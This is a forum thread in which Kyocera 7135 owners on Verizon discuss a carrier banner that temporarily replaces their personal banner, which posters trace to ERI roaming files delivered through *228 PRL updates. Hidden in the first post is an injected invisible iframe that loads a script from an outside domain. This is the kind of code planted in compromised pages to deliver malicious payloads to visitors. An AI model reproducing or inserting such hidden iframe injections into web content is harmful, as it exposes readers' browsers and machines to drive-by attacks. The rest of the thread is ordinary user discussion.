+ Reply to Thread
Page 1 of 2 1 2 LastLast

Verizon Banner Overrides Personal Banner

I have a Verizon version 7135 and whenever I switch to the phone option or open the phone when it is in phone mode, the banner always says "Verizon Wireless" for the first thirty seconds and then switches to my personal banner. My friend has also has a Verizon version 7135, but his phone does not do this. Has anyone else experienced this? Is there a way to disable it? I used to have an Alltel 7135 and the banner did not do this.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

My phone just started to do this also. It is a Verizon (getconneted phone with the latest software). My banner used to say my name now it just says Verizon Wireless. When I open my phone I see my name flash and the the Verizon Logo appears. The Verizon logo has a faint gray bar that hightlights it. I don't remember the gray bar, being there before.

Chatch

Originally posted by cingers
    My phone just started to do this also. It is a Verizon (getconneted phone with the latest software). My banner used to say my name now it just says Verizon Wireless. When I open my phone I see my name flash and the the Verizon Logo appears. The Verizon logo has a faint gray bar that hightlights it. I don't remember the gray bar, being there before.

Chatch
    Mine does the exact same thing, but the logo does go away after 30 seconds and is replaced by my personal banner. What's strange is that not all phones with the current [Verizon] firmware do this.

Originally posted by RMSko
    Mine does the exact same thing, but the logo does go away after 30 seconds and is replaced by my personal banner. What's strange is that not all phones with the current [Verizon] firmware do this.
    Did you check to see if you have the same ERI versions?

-Quick

Originally posted by Quick
    Did you check to see if you have the same ERI versions?

-Quick
    My ERI version is 50020. I know what the MZ and SZ versions mean, but what does the ERI version mean?

Banner

ERI=Enhanced Roaming Indicator, used mainly by Verizon for the Americas Choice Plans. Not only will you see the 'R' to indicate the network you're picking up, but it will show 'Roaming' if your roaming or 'Extended Network'. The 6035 did not have it, most new phones do, the cycle for showing 'Verizon Wireless' is not constant, but comes up each time the phone is authenticated by a tower-this explained to me by a Motorola sales rep.

Originally posted by cingers

Chatch
    Did it start to do that after you programmed the phone using *228 (option 2)? Nobody at either Kyocera or Verizon knows whether this is normal or something is wrong. Does your banner go back to your personal banner after 30 seconds? Perhaps now that many new Verizon phones will be activated this week some other people can post their experience with this issue.

It appears from those that have posted the version details from the newer phones ERI is now available for the 7135. On Verizon, if you have a phone that is ERI capable you will receive an ERI capable PRL when you perform *228. The ERI file works with the PRL to not only tell the phone how to display the roaming indicator as a regular old PRL does, but it also provides an informational banner to display on the phone at certain intervals, usually when it is polling for service (or whatever they call it). The informational banner will stay on the phone display for about 20 or 30 seconds and then return to the deafult banner which is your custom banner. There is no way to change this setting.

Verizon has a variety of current PRL numbers and ERI numbers that have the same contents with exception of the roam indicator setting. The indicator differences is for all of the different rate plans and different model phones.

The only way to get around the ERI banner is to have a non ERI PRL loaded on to your phone. The roam indicator will still work fine by doing this. This would have to be done at a Verizon service center.

Shwemp

thank you for that info. This board is amazing. faster information and more acurate than Verizon Wireless technical support.

20-30 seconds and it changes back to normal.

Thank you.
    Drew
    The one who dies with the most toys WINS :-)

A 7135 and D7A-G in a Civic Hybrid! KB2PMD's Avatar
    Is it possible for someone to post their Verizon ERI and PRL .PDB files ? If anyone is interested, I'd be happy to post my non-ERI PRL file to the board.
    -Mike
    If you haven't already, please vote on a bluetooth voice AND data adapter for the 7135 (that plugs into the serial port, leaving your expansion card slot free!)

Originally posted by KB2PMD
    Is it possible for someone to post their Verizon ERI and PRL .PDB files ? If anyone is interested, I'd be happy to post my non-ERI PRL file to the board.
    -Mike
    I'd be willing to post it, but you'd have to walk me through it as I have no idea how to do it.

RMSko,
    I noticed after a period of time after the Verizon banner comes on and goes off, it come back on again and then off....Seems like it is polling carrier towers or some such thing.

the ERI and PRLs aren't .pdbs. they are on the phone side and you'd need the toolkit to get them.

Yes, there are some files that look like them, but they aren't used for the phone
    LART 'em all! Let /root grep 'em out!

Originally posted by Beryl
    RMSko,
    I noticed after a period of time after the Verizon banner comes on and goes off, it come back on again and then off....Seems like it is polling carrier towers or some such thing.
    Beryl - I haven't noticed that yet. So far today it did switch (after 30 secs) to my personal banner and it's been about 10 minutes and it has not swiched back yet. WAIT, how about this for a coincidence, just as I was typing this it switched back to the Verizon banner and then after a few seconds switched right back to my personal banner. I guess it is suppose to work like that and at some point hopefully we'll get an answer from Verizon.

Same here, just got my phone today directly from Verizon. The first 15 secs it show's Verizon's banner, then mine.

Arrgghhh

Dagi

Originally posted by RMSko
    Did it start to do that after you programmed the phone using *228 (option 2)? Nobody at either Kyocera or Verizon knows whether this is normal or something is wrong. Does your banner go back to your personal banner after 30 seconds? Perhaps now that many new Verizon phones will be activated this week some other people can post their experience with this issue.
    I just updated my PRL with *228 option 2 today. This is the first time I've performed this function since I've had the phone (~3 weeks). I used to have a personal banner, and today, the Verizon banner comes up just as described.

I'm assuming this surprise came with the PRL update, since nothing else changed!

Mine never says Verizon wireless, Just my name-- Unless are we talking about the carrier logo?? I entered my Banner before I activated the phone and I have never *228 as it came preloaded and the VZ rep never told me to.......and I haven't needed to, every where I go it says 1X. any benefits to the *228 I'm unaware of?
    iPhone therefore iAm.

Originally posted by Steve
    Mine never says Verizon wireless, Just my name-- Unless are we talking about the carrier logo?? I entered my Banner before I activated the phone and I have never *228 as it came preloaded and the VZ rep never told me to.......and I haven't needed to, every where I go it says 1X. any benefits to the *228 I'm unaware of?
    *228 option 2 provides your phone with the latest roaming and Verizon tower information. It is beneficial to the extent Verizion adds towers. Verizon recommends doing this programming every month. I do not believe there is any downside to doing it and the upside is possibly better reception.

I think it is the *228 2 option. Yesterday my phone was displaying my banner all day, but calls were bad. When ever I answer a call I would get a pause followed by two beeps then I was able to talk to the caller. BTW, I used to get this with my 6035 also. When this starts to happen I have to do a *228 option 2 to update roaming. Now the Verizon logo is there again.

Once I called VZW to ask about this and the tech told me to do something like a *?18 to lock my code in the tower. I wrote that number down, but lost it. No other tech has told to do that option again. I have to do *228 a couple times a month.

I am in Pittsburgh.

Mine does this as well, it will display the Verizon for about 30 secs and then switch to my banner.

--terry
    --------------------------------------
    Enjoy the journey, it should be just as much fun as the destination.